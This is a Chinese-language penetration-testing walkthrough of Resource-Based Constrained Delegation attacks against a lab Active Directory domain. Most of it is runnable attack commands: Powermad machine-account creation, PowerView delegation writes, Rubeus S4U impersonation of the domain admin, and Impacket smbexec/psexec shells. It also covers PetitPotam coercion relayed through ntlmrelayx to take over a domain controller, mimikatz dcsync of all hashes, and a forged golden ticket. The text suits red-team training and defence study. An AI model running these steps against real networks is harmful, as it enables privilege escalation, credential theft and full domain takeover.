基于资源的约束委派（RBCD）攻击

一、背景知识

基于资源的约束委派相比于非约束委派和约束委派，在设置服务账号和计算机账号的委派权限灵活性更高，基于资源的约束委派不需要域管理员权限去设置，而把设置属性的权限赋予给了机器自身以及加域账号。

1、基于资源的约束性委派的优势

• 委派的权限授予给了拥有资源的后端(B)，而不再是前端(A)
• 约束性委派不能跨域进行委派，基于资源的约束性委派可以跨域和林
• 不再需要域管理员权限设置委派，只需拥有在计算机对象编辑msDS-AllowedToActOnBehalfofotherIdentity属性的权限，也就是将计算机加入域的域用户和机器自身都拥有权限
• 服务账号或计算机账号在执行委派任务时，只能获取到用户的ST票据访问特定服务，不同于非约束委派可直接获取用户的TGT，安全性上有进一步提升

2、约束性委派和基于资源的约束性委派配置的差别

• 传统的约束委派是正向的，通过修改服务A的属性msDS-AllowedToDelegateTo，添加服务B的SPN，设置约束委派对象 (服务B) ，服务A便可以模拟用户向域控制器请求访问服务B的ST服务票据
• 而基于资源的约束委派则是相反的，通过修改服务B属性msDS-AllowedToActOnBehalfofotherIdentity，添加服务A的SID，达到让服务A模拟用户访问服务B的目的
  

---

二、利用条件

资源的约束委派不再需要域管理员权限设置委派，所以我们需要拥有在计算机对象上编辑msDS-AllowedToActOnBehalfOfOtherIdentity属性的权限，也就是，计算机在加入域时，使用的加域用户，和域计算机账号自身是拥有编辑权限的。

在大型内网环境在大型内网域环境中，将机器加入到域环境中一般不会用域管权限，而是用一个专门加域的域用户去操作。那么当我们拿下该域用户的账号密码时，就可以把通过该域用户加入到域里的所有机器都拿下。

利用基于资源的约束委派进行攻击的前提需要:

• 机器账户：域内用户都有一个属性叫做ms-ds-MachineAccountQuota，它代表的是使用该域用户能将多少台计算机加入到域的个数，默认是10，这代表着我们如果拥有一个普通域用户，我们就可以利用这个用户创建新的10个机器账户。机器账户用于委派域内特权账号。

为什么是机器账户？因为攻击的时候会利用到S4U2协议，而它只适用于具有spn的账户，普通账户没有spn，而机器账户默认是注册RestrictedKrbHost/domain和HOST/domain这两个SPN的，这个HOST类型的服务里面包含了很多小的服务例如cifs。它是一些服务的集合体。

• 一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity属性的账户：计算机在加入域时，使用的加域用户，和域计算机账号自身是拥有编辑权限的

可以查询域内计算机的mS-DS-CreatorSID这个值代表的是将计算机加入到域内的用户，它是具有修改msDS-AllowedToActOnBehalfOfOtherIdentity的权限的，如果我们可以拿到这个用户的凭据，就可以控制使用这个用户添加到域内的所有的电脑。

• 域内有可被委派的特权用户：例如域管用户，默认情况下是具备被委派权限，如果特权用户均被取消可被委派权限，则委派攻击将难以达成域内提权效果。

三、利用场景

1、本地域用户权限提升

• 假设一个场景，攻击者在取得域内一个计算机权限后，无法获取本地管理员权限，则可通过委派域内特权账户到本机，从而获取特权账户的ST票据实现本机提权
• 由于在一些域环境中，IT人员习惯使用用户的域账号给用户计算机加域，而不是使用统一的加域账号，这就使得用户可以自己给自己计算机设置msDS-AllowedToActOnBehalfOfOtherIdentity属性

测试环境：	主机名	主机IP	主机账户	主机类型
dc-main-1.qiuqiu.com	10.10.10.10	qiuqiu.com\domain_admin	DC
user1.qiuqiu.com	10.100.0.6	qiuqiu.com\yefan	普通域内机器，被攻击者控制

（1）确定加域账号

如上文所说，我们需要拿下加域账号权限，才有权修改msDS-AllowedToActOnBehalfOfOtherIdentity属性，因此第一步则是确定当前域环境内的加域账号。

• 查询每个域内计算机是由哪个域账号加入域中的：

AdFind.exe  -b "DC=qiuqiu,DC=com" -f "objectClass=computer" mS-DS-CreatorSID

• 查询SID对应的哪个域用户名

AdFind.exe -b "DC=qiuqiu,DC=com" -f "(&(objectsid=S-1-5-21-573638044-2771444813-2757395567-1605))" objectclass cn dn

可以看到当前机器的加域账号，就是自己登陆的域用户。

• 查看加域账号都加过哪些计算机入域

  由于加域账号可以设置自己所有加入域计算机的msDS-AllowedToActOnBehalfOfOtherIdentity属性，这在后续横向到其它计算机时是很有用的，所以通过查询当前加域账号下的所有计算机，可以确定对普通域内计算机的横向范围。

  • 首先查询指定域用户名的SID

    AdFind.exe -default -f "sAMAccountName=yefan" objectSid

    

  • 查看哪些计算机是通过此SID用户加入域中的

    AdFind.exe -b "DC=qiuqiu,DC=com" -f "(&(samAccountType=805306369)(mS-DS-CreatorSID=S-1-5-21-573638044-2771444813-2757395567-1605))" cn sAMAccountType objectCategory

    

（2）添加计算机账号

使用powermad工具添加主机账户：

下载地址：https://github.com/Kevin-Robertson/Powermad

以当前qiuqiu.com\yefan用户创建一个计算机账户newserv，密码Test1234

Import-Module .\Powermad.ps1

New-MachineAccount -MachineAccount newserv -Password $(ConvertTo-SecureString "Test1234" -AsPlainText -Force)

可以使用.运算符来导入PowerShell脚本，这样可以避免执行策略的限制，例如：

. .\powermad.ps1

查看计算机账号是否添加成功：

net group "domain computers" /do

（3）查询新创建的计算机账号SID

查询之前新创建的计算机账号SID，目的是将SID设置到委派资源的msDS-AllowedToActOnBehalfofotherIdentity属性中，使用PowerSploit工具包中的powerview查询：

. .\powerview.ps1

Get-DomainComputer -identity newserv

（4）设置委派关系

设置newserv到user1.qiuqiu.com的委派关系，具体就是在user1.qiuqiu.com上设置msDS-AllowedToActOnBehalfofotherIdentity属性，指定允许来自于newserv的SID的委派，可以使用powerview脚本实现：

// 计算属性值
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-573638044-2771444813-2757395567-1114)"
$SDBytes=New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes,0)

// 设置属性值
Get-DomainComputer user1 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfofotherIdentity'=$SDBytes} -Verbose

检查委派是否配置成功：

Get-DomainComputer user1 -Properties msDS-AllowedToActOnBehalfofotherIdentity

（5）委派特权用户并获取票据

• 认证并生成机器账号的kerberos哈希

  Rubeus.exe hash /user:newserv /password:Test1234 /domain:qiuqiu.com

  

• 使用newserv委派域管账号domain_admin获取服务票据并注入当前会话

  Rubeus.exe s4u /user:newserv$ /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:domain_admin /msdsspn:cifs/user1.qiuqiu.com /ptt

  cifs在/msdsspn:cifs/user1.qiuqiu.com这里指的是“Common Internet File System”。CIFS是SMB(Server Message Block)的一个版本，通常用于文件共享。

• 查看当前会话中缓存的票据

• 验证票据
  普通域用户没有其它用户目录的访问权限，这里可以看到已经具备任意目录访问权限：

---

2、横向到域内其它主机

假设一个场景，攻击者在取得域内一个计算机权限后，同时获取到了加域账号凭据，而当前域环境下很多域主机公用了一个加域账号入网，如果在没有限制特权账号能被委派的情况下，可能导致此加域账号下的所有主机被控。加域账号的凭据获取渠道可能有以下方式：

• IT在给当前失陷的机器加完域后，本地保存了加域账号凭据
• IT为了使用和保存方便，于是将加域账号凭据存放在域内公共共享目录中，如域控sysvol目录
• IT在给新机器加域时，一般会有加域工具，里面可能硬编码了加域账号凭据

测试环境：
已知公共加域账号：add_domain / Test1234

主机名	主机IP	主机账户	主机描述
dc-main-1.qiuqiu.com	10.10.10.10	qiuqiu.com\domain_admin	DC
user1.qiuqiu.com	10.100.0.6	qiuqiu.com\yefan	普通域内机器，被攻击者控制，通过add_domain账号加域
user2.qiuqiu.com	10.100.0.7	qiuqiu.com\yehei	普通域内机器，通过add_domain加域

（1）前置工作流程

前置工作与之前渗透流程一致，需要经过以下步骤：

• 查看当前加域账号下总共有多少机器是由它加入域的
• 在域内添加一个计算机账号newserv用于作为委派用户
• 查询出新创建的计算机账号newserv的SID，用于后续设置在委派资源的msDS-AllowedToActOnBehalfOfOtherIdentity属性中

（2）获取加域账号的TGT

由于修改msDS-AllowedToActOnBehalfOfOtherIdentity属性需要加域账号权限，而当前机器上并没有加域账号的票据，因此需要先向KDC申请，并注入到当前会话中。

Rubeus.exe asktgt /user:add_domain  /password:Test1234 /domain:qiuqiu.com /ptt

（3）设置委派关系到目标资源

本地注入加域账号的TGT后，当前机器就拥有了修改user2计算机的委派属性，向user2.qiuqiu.com的msDS-AllowedToActOnBehalfOfOtherIdentity中写入newserv的SID的委派权限：

// 计算属性值
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-573638044-2771444813-2757395567-1114)"
$SDBytes=New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes,0)

// 设置属性值
Get-DomainComputer user2 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfofotherIdentity'=$SDBytes} -Verbose

（4）委派特权用户并获取票据

• 认证并生成newserv机器账号的kerberos哈希

  Rubeus.exe hash /user:newserv /password:Test1234 /domain:qiuqiu.com

  

• 使用newserv委派域管账号domain_admin获取服务票据并注入当前会话

  Rubeus.exe s4u /user:newserv$ /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:domain_admin /msdsspn:cifs/user2.qiuqiu.com /ptt

现在user1具备了到cifs/user2.qiuqiu.com的服务票据

• 访问user2.qiuqiu.com的服务
  注意要使用主机名访问，不要使用ip访问。

  • 建立ipc$会话：

    net use \\user2.qiuqiu.com\ipc$ /user:qiuqiu.com\domain_admin

  

  • 访问user2默认共享目录

    dir \\user2.qiuqiu.com\c$

  

  • 使用Impacket工具包请求ST票据并远程执行命令

  // 认证机器账号并委派域管账号向KDC申请到目标主机的ST票据
  getST.py qiuqiu.com/newserv\$:Test1234 -spn CIFS/user2.qiuqiu.com -dc-ip 10.10.10.10 -impersonate domain_admin
  
  // 将ST票据文件设置为环境变量
  set KRB5CCNAME=domain_admin.ccache
  
  // 通过smb远程获取交互式shell
  smbexec.py -k -no-pass user2.qiuqiu.com

  

---

3、强制认证+委派接管域控

由于修改msDS-AllowedToActOnBehalfOfOtherIdentity属性只能是当前计算机的加域账号，或者当前计算机账号有权限，如果想通过RBCD攻击拿下域控，就需要获取域管或者域控机器账号的权限，这两个账号的凭据一般无法直接拿到，但可以利用域控的强制认证漏洞，让域控使用自身的机器账号，主动发起认证到攻击者主机，然后攻击者主机可以中继此账号权限到其它域控，完成对域控msDS-AllowedToActOnBehalfOfOtherIdentity属性的修改。

测试环境：

主机名	主机IP	主机账户	主机描述
dc-main-1.qiuqiu.com	10.10.10.10	qiuqiu.com\domain_admin	主域
dc-backup-1.qiuqiu.com	10.10.10.11	qiuqiu.com\domain_admin	备域
user1.qiuqiu.com	10.100.0.6	qiuqiu.com\yefan	普通域内机器，被攻击者控制

（1）添加计算机账号

用于委派其它用户：

. .\Powermad.ps1

New-MachineAccount -MachineAccount newserv -Password $(ConvertTo-SecureString "Test1234" -AsPlainText -Force)

在部分域环境中，管理员可能关闭了普通域用户添加计算机账号的权限，如果这样可以尝试强制认证域控+中继到ldaps服务（不能是ldap服务）的方式添加一个计算机账号

（2）中继到ldap服务添加指定计算机账号到域控的委派权限

• 开启NTLM中继监听

目的是将认证中继到主域控ldap服务，并在主域控SPN服务上添加来自于指定计算机账号的委派权限：

// --remove-mic：清除NTLM协议中的消息完整性检查（MIC）字段，避免中继失败
// --delegate-access：添加委派访问属性
// --escalate-user：指定提升权限的计算机账户

ntlmrelayx.py -t ldap://10.10.10.10 --remove-mic --delegate-access --escalate-user newserv$

在windows上运行ntlmrelayx需要关闭Server服务，否则会因为139/445端口占用，导致程序启动失败

• 强制认证域控

通过域控公开的强制认证漏洞，可使域控的机器账号通过NTLM认证指定地址，常见的强制认证漏洞有以下：

• DFSCoerce：https://github.com/Wh04m1001/DFSCoerce
• PetitPotam：https://github.com/topotam/PetitPotam
• ShadowCoerce：https://github.com/ShutdownRepo/ShadowCoerce
• SpoolSample：https://github.com/leechristensen/SpoolSample

这里使用PetitPotam让域控强制认证到运行了ntlmrelayx的攻击者主机上：

PetitPotam.py 10.100.0.6 10.10.10.11

强制认证的域控不能是中继的目标域控，因为Windows会校验lsass.exe内存中的NTLM Challenge字段，如果发送和接收的一致会导致认证失败，这里是强制认证备域并中继到主域上

• 验证中继攻击结果

当ntlmrelayx接收到来自于备域强制认证过来的NetNTLMHash后，会去处掉MIC字段，并中继到主域上通过认证，随后修改域控计算机账号的msDS-AllowedToActOnBehalfOfOtherIdentity字段，允许来自于攻击者新创建的计算机账号newserv的委派请求。

如果目标域内用户较多，这里执行的时间会比较长

这里可以看到，已经成功添加了newserv到域控计算机DC-BACKUP-1的委派权限：

（3）申请委派特权账号到域控服务的ST票据

随后可以用计算机账号newserv委派成域管账号domain_admin访问域控dc-backup-1.qiuqiu.com的SPN服务，并向KDC申请访问目的服务的ST票据：

getST.py -dc-ip 10.10.10.11 qiuqiu.com/newserv$:Test1234 -spn cifs/dc-backup-1.qiuqiu.com -impersonate domain_admin

（4）使用ST票据接管域控

// 设置ST票据环境变量
set KRB5CCNAME=domain_admin.ccache

// 远程创建交互式cmdshell
smbexec.py -k -no-pass dc-backup-1.qiuqiu.com -codec gb2312

（5）制作黄金票据

• 通过smbclient.py上传文件

// 设置ST票据地址
set KRB5CCNAME=domain_admin.ccache

// 连接到smb服务
smbclient.py -k -no-pass dc-backup-1.qiuqiu.com

// 选择共享目录并上传文件
# use c$
# put winrar.exe
# put mimikatz_trunk.zip

• 通过psexec.py获取交互式shell

set KRB5CCNAME=domain_admin.ccache
psexec.py -k -no-pass dc-backup-1.qiuqiu.com

// 解压mimikatz
winrar.exe x mimikatz_trunk.zip

• dcsync获取krbtgt用户HASH

使用mimikatz本地dcsync域内所有账户的NTLM HASH：

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:qiuqiu.com /all /csv" exit

• 查询域的SID

使用whoami /user命令，域的SID就是不包含最后一部分的SID：

• 使用ticketer.py制作域管的金票：

ticketer.py -nthash 7cb1846696ce7d81f05f861cf41b42a4 -domain-sid S-1-5-21-573638044-2771444813-2757395567 -domain qiuqiu.com  domain_admin

• 使用金票访问域内任意主机

例如访问主域控：

psexec.py -k -no-pass qiuqiu.com/domain_admin@dc-main-1.qiuqiu.comwhoami -codec gb2312